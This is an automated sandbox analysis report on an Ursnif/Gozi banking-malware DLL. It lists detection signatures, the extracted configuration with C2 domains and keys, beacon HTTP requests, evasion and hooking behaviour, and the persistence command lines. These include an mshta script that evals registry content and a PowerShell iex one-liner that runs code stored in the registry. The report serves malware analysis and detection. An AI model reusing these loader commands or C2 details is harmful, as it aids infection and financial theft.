Windows Analysis Report 3a94.dll

Overview

General Information

Sample Name: 3a94.dll
Analysis ID: 444316
MD5: 3a943173c6de419b7078e88c20997838
SHA1: 56567824c6b5c62112a74daa7a1a66e2ec0505d3
SHA256: af98c908f45b6b7893b8cc3121517488c94a93d015af71cd86f8269a971a8836
Tags: dllgozi

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Encoded IEX
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Hooks registry keys query functions (used to hide registry keys)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Suspicious powershell command line found
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

Found malware configuration
Source: 00000005.00000003.347281616.0000000002810000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "ESo3IAssZzE5ysG1EIw/4HtXAsFSsy8tqEpVxnbfbMCCYrlFNqq+URa5v25Vb8Fqg7CHgZW6+XrIJ25ylHpxuJ37IEqPduLid4tbupuJSyqgtTppR4zn02IvafAxKMAHSa619wHPy17p4K0/4kj7C1qaKtM+Xh1a06NCKm5N+m786e7cPquu7R927nhH6gnnNo+As4++HjROKgvXHXtuBEcH4AtLrYsdhCKBIunRJ4/JRjUYKn0tSnPBDf+Na9jWpvJHGTOYnu1CoHdLJTA2dOf5StD7LA6zUT/gtRsdQh+Fypc8IFyYvOY0WUwFr+dLMrtodQ8p5Mt7Wi/ACSlplY8XX2NGugFn+jyVYhw+Opw=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "6000", "server": "580", "serpent_key": "PNJeXnLTijShJqmR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
Multi AV Scanner detection for submitted file
Source: 3a94.dll ReversingLabs: Detection: 68%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_046139C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_046139C5

Compliance:

Uses 32bit PE files
Source: 3a94.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: 3a94.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\vy3v4iby\vy3v4iby.pdb source: powershell.exe, 0000001D.00000002.519694459.000001F1B3EFA000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\vy3v4iby\vy3v4iby.pdbXP source: powershell.exe, 0000001D.00000002.519694459.000001F1B3EFA000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l4nvux4c\l4nvux4c.pdbXP source: powershell.exe, 0000001D.00000002.519823247.000001F1B3F44000.00000004.00000001.sdmp
Source: Binary string: c:\418\521\Condition\lake\Free_yet\Sky.pdb source: 3a94.dll
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l4nvux4c\l4nvux4c.pdb source: powershell.exe, 0000001D.00000002.519823247.000001F1B3F44000.00000004.00000001.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49717 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49717 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49720 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49720 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49722 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49722 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49730 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49730 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49734 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49734 -> 165.232.183.49:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ALLEGHENYHEALTHNETWORKUS ALLEGHENYHEALTHNETWORKUS
Source: global traffic HTTP traffic detected: GET /OQ_2BTgG7j/q3X1MGdBBGa9_2B2m/1G0QfKWqT4Al/JC4ZC0WOm7j/4CP941a6dpq6AY/NxMuCeGanwp5x6mxFdtm_/2BQQ_2BZBXUS0UsE/so7pu77WVpSX0kE/e_2FC7i8m9HUadv_2F/jHuYwYKPu/BKlyw96_2B2HnlpmSd5G/KHfN8q_2FZUhddmueVc/VN22bVsSXOc1F2H2TTIYic/FU2T3AQj_2Bf0/Yc7WUnV_/2FNtnojv1lJnCN4_2B2aG1E/ZT_2F8RuAw/TC3tCpega8r1SAjDV/0ZScgJdMygUO/w95b0xrv2QT/DGrWX40QWt0tWT/QGDiJ9RLs/CJ HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /HXJGZh1qBjYM0G/CMDVQercp7WT9ydNTkT_2/BA1T_2BoFtrG_2Bw/Wj8IRI6jThedYoW/YXdrjvBKs_2BWTN1jd/cRVlgWa0o/p1MOk_2BLI89mWlaMirs/Gdw7n3bR8ORjIY_2Fx6/NYz_2BwvSm9u2x0DN_2BOH/Ni1nKLSa9JhBd/ZE9joS5j/ehlmvjX_2FlxlUw7sENHL6w/CDmAOpgIB5/uqJKH_2B5K5P34v5C/Q_2BbSOhpl7C/1na6SsW0l2M/cy_2FPqMdKquM4/T1TrxnsCco2huo0cd5MLY/0H3wDM7jB_2F837m/FO_2FMxSAhLyD6r/IIFbv4aVX2Mk_2FOSl/48WQx68DGUnQj/_2BFfob HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /TqiKTzAsbmeVPNQuTP2qUWh/hVxtTSY3Yi/llcJ7qkCpZzGG2TVm/waTVAbLoSME8/MiGLgEPqC5C/QMacbN7bi5gg4i/EPDpjwjNeqvxB8nx8goUN/7UScKdA3erCdyZnr/M1mYt7N44_2BCZB/z_2BQHKBZE3I76X4pk/LLUxigZ_2/FKtPJihoxkrQplteHpxJ/SQ5O5MOBE3EqfyedXsa/WMc6NwZF0braqCo_2FtHND/MeZCuTIpsRPeP/oRY2gUKx/_2BWnIG4Butzcab_2F67iqF/5L_2FfljiF/BmcXquDrczHDDG7sB/8E2Nz3hVUHpI/Iejf3l0Gse2/15LRCzp_2Bw/0DMy HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /kXu9tnPyh7IrxOnM_/2F5RL9McC0pC/V4JAp24MS7Z/JdKAzMH5afqP6U/5QKmnqIf4ji_2F0bYULim/Ln9m9S8CJYQHSAL8/9V4ln6b18wizYxs/lBvgnWHKscbAmpSE6F/UvyDHh12X/4KiHWavyPolIq4enzVWO/gZBgK_2BixX_2FpKOLN/j_2FfrEitBIUH8MDLOcNHJ/NhB576j_2Fx2n/eQ5OwroG/raMZRrL38_2FMqHXUW7maRX/ilf2Nc3TMF/dkY1WHkQs6cMiRoJ2/AWmEChw_2BA5/L5BFJV5SVgy/cNqd1hVvvZotyw/XPfvzeOgszjC/s HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: todo.faroin.at
Source: global traffic HTTP traffic detected: GET /6g7Xxs_2FcViNEvb/eUtlbGrmJOFyKjq/4FN1_2BKuLEoXjCSjf/rOtT7yIKe/XRB6VT8HCmGKCo9CPKHU/Y1tIeEDJ_2FZ5yl_2FC/3CWd28J10mPHAD4tnrT0eQ/4O_2BGRTBNWA2/fqx1qdU0/QI6EnaEphgC1mUE1Thrm53Z/ztU91Ji5Ak/31pVhif7ltLzOz9wa/PTfZf7fPEDoP/uPtRBBL_2F_/2FyHjGxoZIO3t9/kK4G4Vnymr0EDYoDEeLP8/HOyGGLeAWlRehWGS/nV7QbBb2S9gvK76/W7SlcXxU8wsH_2FGY1/v4Zp7Lft8CnCAMr/yLw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: todo.faroin.at
Source: unknown DNS traffic detected: queries for: gtr.antoinfer.com
Source: unknown HTTP traffic detected: POST /xJvow4_2/BJDMWjUnNijevmUW57WQQAD/EfF5Sspcyc/NJzdVTwdvpiYxkuku/nPGWvkA08XkQ/vBCHroC_2FE/9zehC8tkQdIdvs/O6XnkCJmSqv_2BmOlhbVu/HQOKlqimRyOan0Iq/gsEUxPO_2FhQGh0/jcvQ1wIS8Gsr9_2FfD/7E8mUZJ_2/BsH5YpBp8iAwhSj0WpLx/lHUKRpbxx3m_2BkZ1XY/A4clpRwWuRrbu_2BeomIJB/3Z5OAlfx3ZfTa/Zr5HnaAB/X29Vmpecpgs5PpmOqAd16fZ/L2jQuizAg_/2BSqqpGpXSe3rgahN/25lGwyN_2BXg/x HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Content-Length: 2Host: todo.faroin.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Jul 2021 14:52:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
Source: {166D056A-DDEC-11EB-90E5-ECF4BB570DC9}.dat.20.dr String found in binary or memory: http://gtr.antoinfer.com/HXJGZh1qBjYM0G/CMDVQercp7WT9ydNTkT_2/BA1T_2BoFtrG_2Bw/Wj8IRI6jThedYoW/YXdrj
Source: {166D0568-DDEC-11EB-90E5-ECF4BB570DC9}.dat.20.dr, ~DF6EAF3ABE87705E33.TMP.20.dr String found in binary or memory: http://gtr.antoinfer.com/OQ_2BTgG7j/q3X1MGdBBGa9_2B2m/1G0QfKWqT4Al/JC4ZC0WOm7j/4CP941a6dpq6AY/NxMuCe
Source: {1D3BDB90-DDEC-11EB-90E5-ECF4BB570DC9}.dat.20.dr String found in binary or memory: http://gtr.antoinfer.com/TqiKTzAsbmeVPNQuTP2qUWh/hVxtTSY3Yi/llcJ7qkCpZzGG2TVm/waTVAbLoSME8/MiGLgEPqC
Source: powershell.exe, 0000001D.00000002.520030038.000001F1BF6C2000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001D.00000002.495812915.000001F1AF870000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001D.00000002.492071617.000001F1AF661000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001D.00000002.495812915.000001F1AF870000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001D.00000002.520030038.000001F1BF6C2000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001D.00000002.520030038.000001F1BF6C2000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001D.00000002.520030038.000001F1BF6C2000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001D.00000002.495812915.000001F1AF870000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001D.00000002.520030038.000001F1BF6C2000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 3.3.rundll32.exe.53494a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5652, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

System Summary:

Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD41EC7 NtMapViewOfSection, 0_2_6DD41EC7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD41B9C GetProcAddress,NtCreateSection,memset, 0_2_6DD41B9C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD42485 NtQueryVirtualMemory, 0_2_6DD42485
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04612D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_04612D06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04618005 NtQueryVirtualMemory, 3_2_04618005
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04812D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 4_2_04812D06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04818005 NtQueryVirtualMemory, 4_2_04818005
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04198005 NtQueryVirtualMemory, 5_2_04198005
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04192D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 5_2_04192D06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_052F2D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 6_2_052F2D06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_052F8005 NtQueryVirtualMemory, 6_2_052F8005
Detected potential crypto function
Found potential string decryption / allocating functions
Source: C:\Windows\System32\loaddll32.exe Code function: String function: 6DD8E9F0 appears 35 times
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engine Classification label: mal100.troj.evad.winDLL@24/16@7/1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0461513E CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,FindCloseChangeNotification, 3_2_0461513E
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{166D0566-DDEC-11EB-90E5-ECF4BB570DC9}.dat
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6844:120:WilError_01
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF3FF9B029E5192D75.TMP
Source: 3a94.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\3a94.dll'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3a94.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3a94.dll,Seasonthing
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3a94.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3a94.dll,Seatforce
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3a94.dll,Spaceclose
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3a94.dll,Time
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17422 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17428 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Gpk8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gpk8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 3a94.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 3a94.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 3a94.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 3a94.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 3a94.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 3a94.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Data Obfuscation:

Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD41F7C LoadLibraryA,GetProcAddress, 0_2_6DD41F7C
PE file contains an invalid checksum
Source: 3a94.dll Static PE information: real checksum: 0xa34b8 should be: 0xa177e
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD42253 push ecx; ret 0_2_6DD42263
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD42200 push ecx; ret 0_2_6DD42209
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDC7583 push ecx; ret 0_2_6DDC7596
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04617A60 push ecx; ret 3_2_04617A69
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04617DCF push ecx; ret 3_2_04617DDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04817A60 push ecx; ret 4_2_04817A69
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04817DCF push ecx; ret 4_2_04817DDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04197A60 push ecx; ret 5_2_04197A69
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04197DCF push ecx; ret 5_2_04197DDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_052F7DCF push ecx; ret 6_2_052F7DDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_052F7A60 push ecx; ret 6_2_052F7A69

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 3.3.rundll32.exe.53494a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.418720560.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418659706.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418632561.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418768006.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444948435.00000000051CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418736133.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418683984.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418753102.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.432262263.0000000005349000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418703457.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5652, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2769
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2786
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7104 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD8E78D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6DD8E78D
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD41F7C LoadLibraryA,GetProcAddress, 0_2_6DD41F7C
Contains functionality to read the PEB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDA2120 mov eax, dword ptr fs:[00000030h] 0_2_6DDA2120
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDB227F mov eax, dword ptr fs:[00000030h] 0_2_6DDB227F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDCE801 mov eax, dword ptr fs:[00000030h] 0_2_6DDCE801
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDCE337 push dword ptr fs:[00000030h] 0_2_6DDCE337
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDCE730 mov eax, dword ptr fs:[00000030h] 0_2_6DDCE730
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD8DFF3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6DD8DFF3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD8E78D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6DD8E78D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDA18EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6DDA18EF

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
